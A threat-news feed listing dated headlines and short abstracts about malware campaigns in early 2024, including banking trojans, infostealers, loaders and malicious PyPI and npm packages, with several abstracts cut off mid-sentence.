“The developers of this malware claim that it can generate up to $30,000 per ATM, making it a lucrative tool for cybercriminals,” reported the website DailyDarkweb. “The malware is fully automated, simplifying its deployment and operation.”Security Affairs
May 27, 2024
Malicious PyPI Packages Targeting Highly Specific MacOS Machines Full Text
Abstract
Cybersecurity researchers at Datadog Security Labs discovered malicious software packages targeting MacOS users through the Python Package Index (PyPI) and NPM repository.DataDog
May 27, 2024 – Government
EU Wants Universities to Work with Intelligence Agencies to Protect Their Research Full Text
Abstract
Europe’s leading research universities should work more closely with the continent’s intelligence agencies to help secure their research from being stolen by hostile states, EU member states recommended this week.The Record
May 24, 2024
BloodAlchemy Malware Used to Target Government Agencies in Southern and Southeastern Asia Full Text
Abstract
BLOODALCHEMY is an updated version of Deed RAT, which is believed to be a successor to ShadowPad malware. It has been used in attacks targeting government organizations in Southern and Southeastern Asia.Itochuci
May 22, 2024
Exploring the Depths of SolarMarker’s Multi-tiered Infrastructure Full Text
Abstract
The core of SolarMarker’s operations is its layered infrastructure, which consists of at least two clusters: a primary one for active operations and a secondary one likely used for testing new strategies or targeting specific regions or industries.Recorded Future
May 20, 2024
Latrodectus Malware Loader Emerges as Potential Replacement for IcedID Full Text
Abstract
Researchers have observed a surge in email phishing campaigns delivering Latrodectus, a new malware loader believed to be the successor to the IcedID malware, which is capable of deploying additional payloads such as QakBot, DarkGate, and PikaBot.Elastic
May 20, 2024
Grandoreiro Banking Trojan is Back With Major Updates Full Text
Abstract
The Grandoreiro banking Trojan has resurfaced with major updates, including enhanced functionality and the ability to target over 1500 global banking applications and websites in more than 60 countries, making it a more potent threat.Info Security Magazine
May 18, 2024
New Android Banking Trojan Mimics Google Play Update App Full Text
Abstract
A new Android banking Trojan called "Antidot" is targeting users across multiple regions by mimicking a Google Play update app and incorporating various malicious features like overlay attacks, keylogging, and remote control capabilities.Infosecurity Magazine
May 13, 2024
GoTo Meeting Software Abused to Deploy Remcos RAT via Rust Shellcode Loader Full Text
Abstract
A recent malware campaign was found exploiting the GoTo Meeting software to deploy the Remcos RAT by using DLL sideloading to execute a malicious DLL file named g2m.dll through a Rust-based shellcode loader.G DATA
May 10, 2024
Android Remote Access Trojan Equipped to Harvest Credentials Full Text
Abstract
This malware uses famous Android app icons to mislead users and trick victims into installing the malicious app on their devices. This includes the icons of Google, Instagram, Snapchat, WhatsApp, and X (formerly Twitter).Sonic Wall
May 8, 2024
zEus Stealer Distributed via Crafted Minecraft Source Pack Full Text
Abstract
Zeus Stealer is designed to steal sensitive information such as passwords and cryptocurrency wallets from infected systems. The attackers utilize the popularity of Minecraft to lure unsuspecting users into downloading and executing the payload.Fortinet
May 6, 2024
HijackLoader Evolves with New Evasion Techniques Full Text
Abstract
HijackLoader is a modular malware loader that is used to deliver second-stage payloads including Amadey, Lumma Stealer, Racoon Stealer v2, and Remcos RAT. HijackLoader decrypts and parses a PNG image to load the next stage.ZScalar
May 1, 2024
New Cuttlefish Malware Infects Routers to Monitor Traffic for Credential Theft Full Text
Abstract
Black Lotus Labs says the malware has been active since at least July 2023. It is currently running an active campaign concentrated in Turkey, with a few infections elsewhere impacting satellite phone and data center services.Bleeping Computer
May 1, 2024
New Wpeeper Android Malware Hides Behind Hacked WordPress Sites Full Text
Abstract
A new Android backdoor malware named 'Wpeeper' has been spotted in at least two unofficial app stores mimicking the Uptodown App Store, a popular third-party app store for Android devices with over 220 million downloads.Bleeping Computer
May 1, 2024
New Latrodectus Malware Attacks Use Microsoft, Cloudflare Themes Full Text
Abstract
Latrodectus malware is now being distributed in phishing campaigns using Microsoft Azure and Cloudflare lures to appear legitimate while making it harder for email security platforms to detect the emails as malicious.Bleeping Computer
April 27, 2024
Zero-Day from 2017 Used Along With Cobalt Strike Loader in Unholy Alliance Full Text
Abstract
The operation involves a malicious PPSX file that drops a custom loader for the Cobalt Strike Beacon malware. The loader employs various techniques to slow down analysis and bypass security solutions.Deep Instinct
April 26, 2024
New Brokewell Malware Takes Over Android Devices, Steals Data Full Text
Abstract
The malware is delivered through a fake Google Chrome update that is shown while using the web browser. Brokewell is under active development and features a mix of extensive device takeover and remote control capabilities.Bleeping Computer
April 26, 2024
Godfather Banking Trojan Spawns 1.2K Samples Across 57 Countries Full Text
Abstract
First discovered in 2022, Godfather — which can record screens and keystrokes, intercepts 2FA calls and texts, initiates bank transfers, and more — has quickly become one of the most widespread malware-as-a-service offerings in cybercrime.Dark Reading
April 24, 2024
Researchers Detail Multistage Attack Hijacking Systems with SSLoad, Cobalt Strike Full Text
Abstract
"SSLoad is designed to stealthily infiltrate systems, gather sensitive information and transmit its findings back to its operators," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.The Hacker News
April 23, 2024
GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining Full Text
Abstract
The GuptiMiner malware campaign, discovered by Avast, involved hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers. The campaign was orchestrated by a threat actor with possible ties to Kimsuky.Avast
April 19, 2024
Fake Cheat Lures Gamers Into Spreading Infostealer Malware Full Text
Abstract
A new info-stealing malware linked to Redline poses as a game cheat called 'Cheat Lab,' promising downloaders a free copy if they convince their friends to install it too.Bleeping Computer
April 15, 2024
Chinese-Linked LightSpy iOS Spyware Targets South Asian iPhone Users Full Text
Abstract
Cybersecurity researchers have discovered a "renewed" cyber espionage campaign targeting users in South Asia with the aim of delivering an Apple iOS spyware implant called LightSpy.The Hacker News
April 10, 2024
Sidestepping SharePoint Security: Two New Techniques to Evade Exfiltration Detection Full Text
Abstract
These techniques can bypass the detection and enforcement policies of traditional tools, such as cloud access security brokers, data loss prevention, and SIEMs, by hiding downloads as less suspicious access and sync events.Varonis
April 9, 2024
Automating Pikabot’s String Deobfuscation Full Text
Abstract
Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms. Previously, the strings were encrypted using a combination of AES-CBC and RC4 algorithms.ZScalar
April 8, 2024
Fake Facebook MidJourney AI Page Promoted Malware to 1.2 Million People Full Text
Abstract
Hackers are using Facebook advertisements and hijacked pages to promote fake Artificial Intelligence services, such as MidJourney, OpenAI's SORA and ChatGPT-5, and DALL-E, to infect unsuspecting users with password-stealing malware.Bleeping Computer
April 8, 2024
Hackers can Use AI Hallucinations to Spread Malware Full Text
Abstract
One security researcher investigating AI-hallucinated libraries said late last month that he found chatbots calling for a nonexistent Python package dubbed "huggingface-cli."Healthcare Info Security
April 6, 2024
New Latrodectus Malware Replaces IcedID in Network Breaches Full Text
Abstract
While similar to IcedID, Proofpoint researchers confirmed it is an entirely new malware, likely created by the IcedID developers. Latrodectus shares infrastructure overlap with historic IcedID operations.Bleeping Computer
April 6, 2024
Visa Warns of New JSOutProx Malware Variant Targeting Financial Organizations Full Text
Abstract
First encountered in December 2019, JsOutProx is a RAT and highly obfuscated JavaScript backdoor that allows its operators to run shell commands, download additional payloads, execute files, capture screenshots, establish persistence, and more.Bleeping Computer
April 5, 2024
Bing Ad for NordVPN Leads to SecTopRAT Full Text
Abstract
A very recent malvertising campaign was found impersonating the popular VPN software NordVPN. A malicious advertiser is capturing traffic from Bing searches and redirecting users to a decoy site that looks almost identical to the real one.Malware Bytes
April 5, 2024
Byakugan – The Malware Behind a Phishing Attack Full Text
Abstract
In January 2024, FortiGuard Labs collected a PDF file written in Portuguese that distributes a multi-functional malware known as Byakugan. While investigating this campaign, a report about it was published.Fortinet
April 4, 2024
Distinctive Campaign Evolution of Pikabot Malware Full Text
Abstract
PikaBot, along with other malicious loaders like QBot and DarkGate, heavily depends on spam campaigns for distribution. Its initial access strategies are intricately crafted, utilizing geographically targeted spam emails for specific countries.MCafee
April 4, 2024
Magento Shoplift Malware Targets Both WordPress and Magento CMS on E-Commerce Sites Full Text
Abstract
While it pretends to be a Google Analytics script, this is merely a distraction from the true nature of the credit card skimming JavaScript code snippet embedded in the infected website.Sucuri
April 2, 2024
Vultur Banking Malware for Android Poses as McAfee Security App Full Text
Abstract
Fox-IT warned that a new, evasive version of Vultur spreads to victims through a hybrid attack that relies on SMS phishing and phone calls that trick the targets into installing a version of the malware that masquerades as the McAfee Security app.Bleeping Computer
April 1, 2024
DinodasRAT Malware Targets Linux Servers in Espionage Campaign Full Text
Abstract
When executed, the Linux variant of DinodasRAT creates a hidden file in the directory where its binary resides, which acts as a mutex to prevent multiple instances from running on the infected device.Bleeping Computer
April 1, 2024
Researchers Dissect Infostealer Malware Targeting macOS Users Full Text
Abstract
The ongoing infostealer attacks targeting macOS users may have adopted different methods to compromise victims' Macs, but operate with the end goal of stealing sensitive data, Jamf Threat Labs said in a report published Friday.JAMF
March 30, 2024
Malicious Backdoor Spotted in Linux Compression Library XZ Full Text
Abstract
This supply-chain compromise may have been caught early enough to prevent widespread exploitation, and it may only mainly affect bleeding-edge distros that picked up the latest xz versions right away.The Register
March 30, 2024
Over 100 Malicious Packages Target Popular ML PyPi Libraries Full Text
Abstract
Early on March 28, 2024, the Mend.io research team detected more than 100 malicious packages targeting the most popular machine learning (ML) libraries from the PyPi registry. Among those libraries are Pytorch, Matplotlib, and Selenium.Mend
March 28, 2024
Hackers Developing Malicious LLMs After WormGPT Falls Flat Full Text
Abstract
Cybercrooks are exploring ways to develop custom, malicious large language models after existing tools such as WormGPT failed to cater to their demands for advanced intrusion capabilities, security researchers said.Healthcare Info Security
March 28, 2024
Apps Secretly Turning Devices Into Proxy Network Nodes Removed From Google Play Full Text
Abstract
Though the LumiApps’s privacy policy talks about devices being part of the LumiApps networks, app developers might not read it before starting to use the malicious SDK in their apps.Help Net Security
March 23, 2024
New Go Loader Pushes Rhadamanthys Stealer Full Text
Abstract
PuTTY is a very popular SSH and Telnet client for Windows used by IT admins for years. The threat actor bought an ad that claims to be the PuTTY homepage and appeared at the top of the Google search results page, right before the official website.Malware Bytes
March 21, 2024
Sign1 Malware: Analysis, Campaign History & Indicators of Compromise Full Text
Abstract
The malware injects JavaScript to perform unwanted redirects by using sophisticated obfuscation techniques, including time-based randomization and XOR encoding, to evade detection.Securi
March 21, 2024
The Most Prevalent Malware Behaviors and Techniques Full Text
Abstract
An analysis of 100,000+ Windows malware samples has revealed the most prevalent techniques used by malware developers to successfully evade defenses, escalate privileges, execute the malware, and assure its persistence.Help Net Security
March 16, 2024
Inside the Rabbit Hole: BunnyLoader 3.0 Unveiled Full Text
Abstract
The new BunnyLoader variant comes with a Command and Control (C2) update, modularization of the binary, and various modules such as keylogger, stealer, clipper, and DoS functions.Palo Alto Networks
March 12, 2024
Malicious PyPI Packages Target Crypto Wallet Recovery Passwords in BIPClip Campaign Full Text
Abstract
The malicious packages used name squatting, disguised dependencies, and legitimate-looking code to steal mnemonic phrases, evading detection and targeting crypto assets without broader system compromise.Cyware
March 11, 2024
Fake Leather Wallet App on Apple App Store is a Crypto Drainer Full Text
Abstract
The developers of the Leather cryptocurrency wallet have issued a warning about a counterfeit app on the Apple App Store. This fake app has led to users reporting that it drains their wallets and steals their digital assets.Cyware
March 9, 2024
New Malware Campaign Found Exploiting Stored XSS in Popup Builder Full Text
Abstract
A new malware campaign was found targeting the Popup Builder WordPress plugin, exploiting a vulnerability disclosed in November 2023. The campaign injects malicious code into websites, leading to over 3,300 infections.Cyware
March 8, 2024
New Python-Based Snake Info-Stealer Spreads Through Facebook Messages Full Text
Abstract
The Snake malware campaign has been active since at least August 2023 and is attributed to Vietnamese-speaking individuals based on indicators such as targeted browsers and comments in the scripts.Cyware
March 6, 2024
Researchers Warn of Stuxnet-Style Web-Based PLC Malware Full Text
Abstract
Researchers from the Georgia Institute of Technology have developed web-based malware called IronSpider, targeting modern programmable logic controllers (PLCs) used in industrial control systems.Cyware
March 6, 2024
New WogRAT Malware Abuses Online Notepad Service to Store Malicious Code Full Text
Abstract
The 'WogRAT' malware targets both Windows and Linux systems and uses the online notepad platform 'aNotepad' to store and retrieve malicious code, making its infection chain stealthy.Cyware
March 6, 2024
Android and Windows RATs Distributed Via Online Meeting Lures Full Text
Abstract
The attackers used fake Russian-language online meeting sites hosted on a single IP address to distribute malicious APK and BAT files targeting Windows and Android users.Cyware
March 5, 2024
New CHAVECLOAK Banking Trojan Targets Brazilians via Malicious PDFs Full Text
Abstract
The malware uses DLL sideloading techniques to discreetly execute malicious code, actively monitors victims' interactions with financial portals, and communicates with a C2 server to facilitate data theft and deceptive pop-up windows.Cyware
March 5, 2024
Self-Propagating Worm Created to Target Generative AI Systems Full Text
Abstract
Researchers from Israel Institute of Technology, Intuit and Cornell Tech have developed a computer worm called "Morris II" that targets generative AI (GenAI) applications to spread malware and steal personal data.Cyware
March 1, 2024
New Bifrost Variant Uses Domain Deception Tactic to Deceive Users Full Text
Abstract
The latest variant of BIFROSE masquerades as VMware by reaching out to a deceptive domain. There has been a spike in BIFROSE activity since October 2023, and a new Arm version of the malware has been discovered.Cyware
March 1, 2024
Chinese PC-Maker Acemagic Shipped Machines Infected with Malware Full Text
Abstract
The company attributed the infection to software adjustments made by developers to reduce boot times, which inadvertently affected network settings and omitted digital signatures.Cyware
February 29, 2024
GTPDOOR Linux Malware Targets Telecoms, Exploiting GPRS Roaming Networks Full Text
Abstract
GTPDOOR is a new Linux malware designed for telecom networks that leverages the GPRS Tunnelling Protocol (GTP) for command-and-control communications, posing a threat to subscriber information and call metadata.Cyware
February 28, 2024
Malicious Code in Tornado Cash Governance Proposal Puts User Funds at Risk Full Text
Abstract
The compromise was introduced via a governance proposal, and the Tornado Cash Developers confirmed the compromise, urging users to withdraw old deposit notes and token holders to cancel their votes for the malicious proposal.Cyware
February 27, 2024
Open-Source Xeno RAT Trojan Emerges as a Potent Threat on GitHub Full Text
Abstract
The multi-stage dissemination of Xeno RAT via Discord CDN demonstrates the use of deceptive tactics such as disguised shortcut files to deliver and execute the open-source malware.Cyware
February 23, 2024
New Malware-as-a-Service Info-Stealer Malware Targets Oil and Gas Companies Full Text
Abstract
An advanced phishing campaign targeting the Oil and Gas industry is distributing the Rhadamanthys Stealer, an uncommon and sophisticated Malware-as-a-Service information stealer.Cyware
February 23, 2024
Linux Malware ‘Migo’ Targets Redis for Cryptojacking Attacks Full Text
Abstract
Researchers spotted a new Migo malware targeting Redis servers to mine cryptocurrency and utilizing system-weakening commands to disable security features. Migo is distributed as a Golang ELF binary, with compile-time obfuscation and the ability to persist on Linux hosts. Organizations are expected ... Read MoreCyware
February 22, 2024
Russian Consular Software Installer Backdoored to Deploy Konni RAT Full Text
Abstract
This activity is linked to actors from North Korea targeting Russia. The trojan is being distributed through backdoored software installers and is capable of file transfers and command execution.Cyware
February 22, 2024
New Open-Source Self-Modifying Worm Tool SSH-Snake Threatens Networks Full Text
Abstract
The worm autonomously searches for SSH credentials, modifies itself to remain fileless, and uses a variety of methods to collect private keys, making it difficult to detect statically.Cyware
February 21, 2024
New Malicious PyPI Packages Caught Using Covert Side-Loading Tactics Full Text
Abstract
ReversingLabs' research revealed a broader campaign involving multiple packages and sophisticated tactics, indicating an emerging trend of DLL sideloading attacks in open-source environments.Cyware
February 21, 2024
New ‘VietCredCare’ Stealer Targeting Facebook Advertisers in Vietnam Full Text
Abstract
The malware is distributed through links to bogus sites on social media and messaging platforms, and it is designed to filter out Facebook credentials while evading detection by security software.Cyware
February 21, 2024
New Migo Malware Targeting Redis Servers for Cryptocurrency Mining Full Text
Abstract
Migo disables security defenses on Redis servers, sets up keys for SSH access, and deploys a modified rootkit to hide processes and artifacts, resembling tactics used by known cryptojacking groups.Cyware
February 20, 2024
Newly Discovered RustDoor Malware Impersonates Visual Studio Update Full Text
Abstract
A new macOS malware dubbed RustDoor, written in Rust, is being distributed disguised as a Visual Studio update. The malware provides backdoor access to compromised systems and is linked to infrastructure associated with the BlackCat ransomware gang. Researchers have shared a list of known IOCs ... Read MoreCyware
February 19, 2024
Anatsa Android Trojan Bypasses Google Play Security, Expands Reach to New Countries Full Text
Abstract
The Android banking trojan Anatsa has expanded its reach to include Slovakia, Slovenia, and Czechia, demonstrating the capability to bypass restricted settings for accessibility service in Android 13.Cyware
February 19, 2024
PDF Malware on the Rise, Used to Spread WikiLoader, Ursnif, and DarkGate Full Text
Abstract
Cybercriminals are using ad tools to track and optimize their malware campaigns, making their lures more convincing and increasing the likelihood of users falling victim to the attacks.Cyware
February 17, 2024
SpyNote Android Spyware Poses as Legit Crypto Wallets, Steals Funds Full Text
Abstract
Android users are advised to be cautious of applications requesting Accessibility API access, particularly those claiming to be crypto wallets, PDF readers, and video players.Cyware
February 15, 2024
North Korea Turns to Designing Malware-Infected Gambling Websites for Cash Full Text
Abstract
The operation is carried out by an IT organization called "Gyeongheung," affiliated with North Korea's secretive Office 39. These websites are sold for $5,000 a month, with additional tech support for $3,000.Cyware
February 14, 2024
More Signs of a Qakbot Resurgence Full Text
Abstract
Security researchers have lately observed new builds and incremental changes to the malware, indicating that someone with access to its source code is experimenting with it.Cyware
February 13, 2024
Diving Into Glupteba’s UEFI Bootkit Full Text
Abstract
The Pay-Per-Install (PPI) ecosystem, originally intended for distributing advertisements, has evolved into a profitable platform for spreading spyware and malware, including threats like Glupteba.Cyware
February 10, 2024
Alert: New Stealthy “RustDoor” Backdoor Targeting Apple macOS Devices Full Text
Abstract
Apple macOS users are the target of a new Rust-based backdoor that has been operating under the radar since November 2023. The backdoor, codenamed RustDoor by Bitdefender, has been found to impersonate an update for Microsoft Visual Studio and target both Intel and Arm architectures. The exact initial access pathway used to propagate the implant is currently not known, although it's said to be distributed as FAT binaries that contain Mach-O files. Multiple variants of the malware with minor modifications have been detected to date, likely indicating active development. The earliest sample of RustDoor dates back to November 2, 2023. It comes with a wide range of commands that allow it to gather and upload files, and harvest information about the compromised endpoint. Some versions also include configurations with details about what data to collect, the list of targeted extensions and directories, and the directories to exclude. The captured information is then exfiltrateThe Hacker News
February 09, 2024
Raspberry Robin Malware Upgrades with Discord Spread and New Exploits Full Text
Abstract
The operators of Raspberry Robin are now using two new one-day exploits to achieve local privilege escalation, even as the malware continues to be refined and improved to make it stealthier than before. This means that "Raspberry Robin has access to an exploit seller or its authors develop the exploits themselves in a short period of time," Check Point said in a report this week. Raspberry Robin (aka QNAP worm), first documented in 2021, is an evasive malware family that's known to act as one of the top initial access facilitators for other malicious payloads, including ransomware. Attributed to a threat actor named Storm-0856 (previously DEV-0856), it's propagated via several entry vectors, including infected USB drives, with Microsoft describing it as part of a "complex and interconnected malware ecosystem" with ties to other e-crime groups like Evil Corp, Silence, and TA505 . Raspberry Robin's use of one-day exploits such as CVE-2020-The Hacker News
February 09, 2024
MoqHao Android Malware Evolves with Auto-Execution Capability Full Text
Abstract
Threat hunters have identified a new variant of Android malware called MoqHao that automatically executes on infected devices without requiring any user interaction. "Typical MoqHao requires users to install and launch the app to get their desired purpose, but this new variant requires no execution," McAfee Labs said in a report published this week. "While the app is installed, their malicious activity starts automatically." The campaign's targets include Android users located in France, Germany, India, Japan, and South Korea. MoqHao, also called Wroba and XLoader (not to be confused with the Windows and macOS malware of the same name), is an Android-based mobile threat that's associated with a Chinese financially motivated cluster dubbed Roaming Mantis (aka Shaoye). Typical attack chains commence with package delivery-themed SMS messages bearing fraudulent links that, when clicked from Android devices, lead to the deployment of the malware bThe Hacker News
February 9, 2024
‘Coyote’ Malware Begins Its Hunt, Preying on 61 Banking Apps Full Text
Abstract
Brazilian banking trojans have a history of expanding abroad, and the emergence of new variants like "Coyote" could lead to their evolution into fully fledged initial access trojans and backdoors.Cyware
February 09, 2024
New Coyote Trojan Targets 61 Brazilian Banks with Nim-Powered Attack Full Text
Abstract
Sixty-one banking institutions, all of them originating from Brazil, are the target of a new banking trojan called Coyote . "This malware utilizes the Squirrel installer for distribution, leveraging Node.js and a relatively new multi-platform programming language called Nim as a loader to complete its infection," Russian cybersecurity firm Kaspersky said in a Thursday report. What makes Coyote a different breed from other banking trojans of its kind is the use of the open-source Squirrel framework for installing and updating Windows apps. Another notable departure is the shift from Delphi – which is prevalent among banking malware families targeting Latin America – to an uncommon programming language like Nim. In the attack chain documented by Kaspersky, a Squirrel installer executable is used as a launchpad for a Node.js application compiled with Electron, which, in turn, runs a Nim-based loader to trigger the execution of the malicious Coyote payload by means ofThe Hacker News
February 8, 2024
HijackLoader Expands Techniques to Improve Defense Evasion Full Text
Abstract
The HijackLoader sample exhibits complex multi-stage behavior, including process hollowing, transacted section hollowing, and user mode hook bypass using Heaven’s Gate, to inject and execute the final payload while evading detection.Cyware
February 08, 2024
HijackLoader Evolves: Researchers Decode the Latest Evasion Methods Full Text
Abstract
The threat actors behind a loader malware called HijackLoader have added new techniques for defense evasion, as the malware continues to be increasingly used by other threat actors to deliver additional payloads and tooling. "The malware developer used a standard process hollowing technique coupled with an additional trigger that was activated by the parent process writing to a pipe," CrowdStrike researchers Donato Onofri and Emanuele Calvelli said in a Wednesday analysis. "This new approach has the potential to make defense evasion stealthier." HijackLoader was first documented by Zscaler ThreatLabz in September 2023 as having been used as a conduit to deliver DanaBot, SystemBC, and RedLine Stealer. It's also known to share a high degree of similarity with another loader known as IDAT Loader. Both the loaders are assessed to be operated by the same cybercrime group. In the intervening months, HijackLoader has been propagated via ClearFake and put toThe Hacker News
February 08, 2024
Kimsuky’s New Golang Stealer ‘Troll’ and ‘GoBear’ Backdoor Target South Korea Full Text
Abstract
The North Korea-linked nation-state actor known as Kimsuky is suspected of using a previously undocumented Golang-based information stealer called Troll Stealer . The malware steals "SSH, FileZilla, C drive files/directories, browsers, system information, [and] screen captures" from infected systems, South Korean cybersecurity company S2W said in a new technical report. Troll Stealer's links to Kimsuky stem from its similarities to known malware families, such as AppleSeed and AlphaSeed malware that have been attributed to the group. Kimsuky, also tracked under the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima, is well known for its propensity to steal sensitive, confidential information in offensive cyber operations. In late November 2023, the threat actors were sanctioned by the U.S. Treasury Department's Office of Foreign Assets Control (OFAC) for gathering intelligence to further NorthThe Hacker News
February 5, 2024
New Mispadu Banking Trojan Exploits Windows SmartScreen Flaw Full Text
Abstract
The Windows SmartScreen vulnerability CVE-2023-36025 allows threat actors to bypass warnings and execute malicious payloads using crafted .url files, posing a significant security risk to Windows users.Cyware
February 05, 2024
Pegasus Spyware Targeted iPhones of Journalists and Activists in Jordan Full Text
Abstract
The iPhones belonging to nearly three dozen journalists, activists, human rights lawyers, and civil society members in Jordan have been targeted with NSO Group's Pegasus spyware, according to joint findings from Access Now and the Citizen Lab. Nine of the 35 individuals have been publicly confirmed as targeted , out of whom six had their devices compromised with the mercenary surveillanceware tool. The infections are estimated to have taken place from at least 2019 until September 2023. "In some cases, perpetrators posed as journalists, seeking an interview or a quote from victims, while embedding malicious links to Pegasus spyware amid and in between their messages," Access Now said . "A number of victims were reinfected with Pegasus spyware multiple times — demonstrating the relentless nature of this targeted surveillance campaign." The Israeli company has been under the radar for failing to implement rigorous human rights safeguards prior to sellingThe Hacker News
February 3, 2024
macOS Malware Campaign Showcases Novel Delivery Technique Full Text
Abstract
The backdoor, called Activator, employs a unique delivery method that backdoors the victim during the installation process, making it challenging to remove the infection even if the cracked software is removed.Cyware
February 02, 2024
DirtyMoe Malware Infects 2,000+ Ukrainian Computers for DDoS and Cryptojacking Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned that more than 2,000 computers in the country have been infected by a strain of malware called DirtyMoe. The agency attributed the campaign to a threat actor it calls UAC-0027 . DirtyMoe , active since at least 2016, is capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks. In March 2022, cybersecurity firm Avast revealed the malware's ability to propagate in a worm-like fashion by taking advantage of known security flaws. The DDoS botnet is known to be delivered by means of another malware referred to as Purple Fox or via bogus MSI installer packages for popular software such as Telegram. Purple Fox is also equipped with a rootkit that allows the threat actors to hide the malware on the machine and make it difficult to detect and remove. The exact initial access vector used in the campaign targeting Ukraine is currently unknown. CERT-UA is recommending that organizaThe Hacker News
February 01, 2024
HeadCrab 2.0 Goes Fileless, Targeting Redis Servers for Crypto Mining Full Text
Abstract
Cybersecurity researchers have detailed an updated version of the malware HeadCrab that's known to target Redis database servers across the world since early September 2021. The development, which comes exactly a year after the malware was first publicly disclosed by Aqua, is a sign that the financially-motivated threat actor behind the campaign is actively adapting and refining their tactics and techniques to stay ahead of the detection curve. The cloud security firm said that "the campaign has almost doubled the number of infected Redis servers," with an additional 1,100 compromised servers, up from 1,200 reported at the start of 2023. HeadCrab is designed to infiltrate internet-exposed Redis servers and wrangle them into a botnet for illicitly mining cryptocurrency, while also leveraging the access in a manner that allows the threat actor to execute shell commands, load fileless kernel modules, and exfiltrate data to a remote server. While the origins of thThe Hacker News
January 30, 2024
New ZLoader Malware Variant Surfaces with 64-bit Windows Compatibility Full Text
Abstract
Threat hunters have identified a new campaign that delivers the ZLoader malware, resurfacing nearly two years after the botnet's infrastructure was dismantled in April 2022. A new variant of the malware is said to have been in development since September 2023, Zscaler ThreatLabz said in an analysis published this month. "The new version of Zloader made significant changes to the loader module, which added RSA encryption, updated the domain generation algorithm, and is now compiled for 64-bit Windows operating systems for the first time," researchers Santiago Vicente and Ismael Garcia Perez said . ZLoader, also known by the names Terdot, DELoader, or Silent Night, is an offshoot of the Zeus banking trojan that first surfaced in 2015, before pivoting to functioning as a loader for next-stage payloads, including ransomware. Typically distributed via phishing emails and malicious search engine ads, ZLoader suffered a huge blow after a group of companies led by MicrosThe Hacker News
January 29, 2024
Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines Full Text
Abstract
Cybersecurity researchers have identified malicious packages on the open-source Python Package Index (PyPI) repository that deliver an information stealing malware called WhiteSnake Stealer on Windows systems. The malware-laced packages are named nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. They have been uploaded by a threat actor named "WS." "These packages incorporate Base64-encoded source code of PE or other Python scripts within their setup.py files," Fortinet FortiGuard Labs said in an analysis published last week. "Depending on the victim devices' operating system, the final malicious payload is dropped and executed when these Python packages are installed." While Windows systems are infected with WhiteSnake Stealer, compromised Linux hosts are served a Python script designed to harvest information. The activity, which predominantly targets Windows users, overlaps with a prior campaign that JFrogThe Hacker News
January 27, 2024
AllaKore RAT Malware Targeting Mexican Firms with Financial Fraud Tricks Full Text
Abstract
Mexican financial institutions are under the radar of a new spear-phishing campaign that delivers a modified version of an open-source remote access trojan called AllaKore RAT . The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin American-based financially motivated threat actor. The campaign has been active since at least 2021. "Lures use Mexican Social Security Institute (IMSS) naming schemas and links to legitimate, benign documents during the installation process," the Canadian company said in an analysis published earlier this week. "The AllaKore RAT payload is heavily modified to allow the threat actors to send stolen banking credentials and unique authentication information back to a command-and-control (C2) server for the purposes of financial fraud." The attacks appear to be designed to particularly single out large companies with gross revenues over $100 million. Targeted entities span retail, agriculture, pubThe Hacker News
January 25, 2024
SystemBC Malware’s C2 Server Analysis Exposes Payload Delivery Tricks Full Text
Abstract
Cybersecurity researchers have shed light on the command-and-control (C2) server of a known malware family called SystemBC . "SystemBC can be purchased on underground marketplaces and is supplied in an archive containing the implant, a command-and-control (C2) server, and a web administration portal written in PHP," Kroll said in an analysis published last week. The risk and financial advisory solutions provider said it has witnessed an increase in the use of malware throughout Q2 and Q3 2023. SystemBC, first observed in the wild in 2018, allows threat actors to remote control a compromised host and deliver additional payloads, including trojans, Cobalt Strike, and ransomware. It also features support for launching ancillary modules on the fly to expand on its core functionality. A standout aspect of the malware revolves around its use of SOCKS5 proxies to mask network traffic to and from C2 infrastructure, acting as a persistent access mechanism for post-exploitatThe Hacker News
January 25, 2024
LODEINFO Fileless Malware Evolves with Anti-Analysis and Remote Code Tricks Full Text
Abstract
Cybersecurity researchers have uncovered an updated version of a backdoor called LODEINFO that's distributed via spear-phishing attacks. The findings come from Japanese company ITOCHU Cyber & Intelligence, which said the malware "has been updated with new features, as well as changes to the anti-analysis (analysis avoidance) techniques." LODEINFO (versions 0.6.6 and 0.6.7) was first documented by Kaspersky in November 2022, detailing its capabilities to execute arbitrary shellcode, take screenshots, and exfiltrate files back to an actor-controlled server. A month later, ESET disclosed attacks targeting Japanese political establishments that led to the deployment of LODEINFO. The backdoor is the work of a Chinese nation-state actor known as Stone Panda (aka APT10, Bronze Riverside, Cicada, Earth Tengshe, MirrorFace, and Potassium), which has a history of orchestrating attacks targeting Japan since 2021. Attack chains commence with phishing emails bearingThe Hacker News
January 25, 2024
Unmasking MacOS Malware in Pirated Apps Full Text
Abstract
Pirate applications targeting macOS users distribute a backdoor, allowing attackers to download and execute multiple payloads. Each application includes a malicious dylib, a backdoor, and a persistent downloader, posing a significant threat to users. The researchers from Jamf Threat Labs identified ... Read MoreCyware
January 23, 2024
Malicious NPM Packages Exfiltrate Hundreds of Developer SSH Keys via GitHub Full Text
Abstract
Two malicious packages discovered on the npm package registry have been found to leverage GitHub to store Base64-encrypted SSH keys stolen from developer systems on which they were installed. The modules named warbeast2000 and kodiak2k were published at the start of the month, attracting 412 and 1,281 downloads before they were taken down by the npm maintainers. The most recent downloads occurred on January 21, 2024. Software supply chain security firm ReversingLabs, which made the discovery, said there were eight different versions of warbeast2000 and more than 30 versions of kodiak2k. Both the modules are designed to run a postinstall script after installation, each capable of retrieving and executing a different JavaScript file. While warbeast2000 attempts to access the private SSH key, kodiak2k is designed to look for a key named "meow," raising the possibility that the threat actor likely used a placeholder name during the early stages of the development.The Hacker News
January 23, 2024
“Activator” Alert: MacOS Malware Hides in Cracked Apps, Targeting Crypto Wallets Full Text
Abstract
